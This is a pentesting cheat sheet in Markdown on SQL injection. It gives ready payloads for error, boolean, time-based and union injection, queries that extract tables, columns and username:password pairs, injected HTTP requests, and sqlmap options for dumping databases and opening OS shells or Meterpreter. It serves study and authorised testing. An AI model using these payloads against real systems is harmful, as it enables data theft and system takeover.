killchain-compendium/exploit/sqli/sqli.md

174 lines
5.5 KiB
Markdown

# SQL Injection
* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/)
## Finding an Opportunity
* GET parameter
```sh
http://example.com/index.php?id=' or 1=1 -- -
```
* Sometimes an ID or may come first
```sh
http://example.com/index.php?id=10 or 1=1 -- +
http://example.com/index.php?id=10' or '1'='1'-- -
http://example.com/index.php?id=-1' or 1=1 -- -&password=x
```
* Provoke error to gain information
```sh
http://example.com/index.php?id='
```
* **Incase of client side sanitization craft the URL instead of using the form!!!**
## Usage
* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
```sql
SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
```
### Boolean True and False
```sql
SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
```
* Blind boolean base substring fuzzing, one char at a time, by inspecting the return value after each inserted char.
```sql
' UNION SELECT null,null,null where database() like 'da%';-- -
```
### Time based
* Checking input blindly via sleep() function. Count number of cols in this way. If it is successful, the sleep(5) function executes
```sql
' union select sleep(3), null; -- -
```
### Blind injection // Guessing characters
```sh
http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
```
```sh
http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
```
* Function substr(string, start, length)
* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump`
### Union based
* _First method__ check by order until error occurs
```sql
' order by 1 -- -
' order by 2 -- -
' order by 3 -- -
```
* __Second method__ fuzzing NULL values, followed by fuzzing data types
* Check number of cols
```sql
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# until the error occurs
```
* Check which one is a string
```sql
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
```
* Retrieve content, for cols and comment two times as an example. Or dump database
```sql
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
' UNION SELECT NULL,username,password,NULL FROM users -- //
```
* Retrieve content by union poking the count and order, afterwards extracting tables via
```sh
0 union select null, null, database()
0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db'
0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename'
0 union select null, null, group_concat(username, ':', password from found_tablename
```
* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
### Identify Database
```sh
id=sqlite_version()
id=@@version # mysql/mssql
id=(SELECT banner FROM v$version) # oracle
```
#### SQL Functions
* Use sql functions to fumble the tables & cols via union
* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)
* Extract tables
```sql
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
```
* sqlite specific
```sql
' UNION SELECT sql, sql FROM sqlite_master -- -
```
```sql
(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
```
* Extract cols
```sh
1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
```
* Data from cols
```sql
1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
```
### Examples
* sqli inside HTTP request to an API. Five values inside select have been discovered before
```HTTP
GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
```
* Get col names
```HTTP
GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
```
* Get notes from users by id
```HTTP
GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
```
## Tools
### SQLmap
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
* Use `-r` with a saved HTTP request
```sh
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
```
* Select form data automatically
```sh
sqlmap -u http://<target-IP>/site.php --forms --dump-all
```
|Parameter|Details|
|-r|Uses the intercepted request save as a file|
|--dbms|DBMS of target|
|--dump|Dump the entire database|
|--dump-all|Dump everything|
|-p |TESTPARAMETER|
|--os-shell|Prompt for an interactive operating system shell|
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
### Damn Small SQLi Scanner (DSSS)
* [Script](https://github.com/stamparm/DSSS.git)
```sh
python dsss.py -u "http://example.com/index.php?id="
```
### Online sqlmap
* [Link](https://suip.biz/?act=sqlmap)
## Payloads
* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)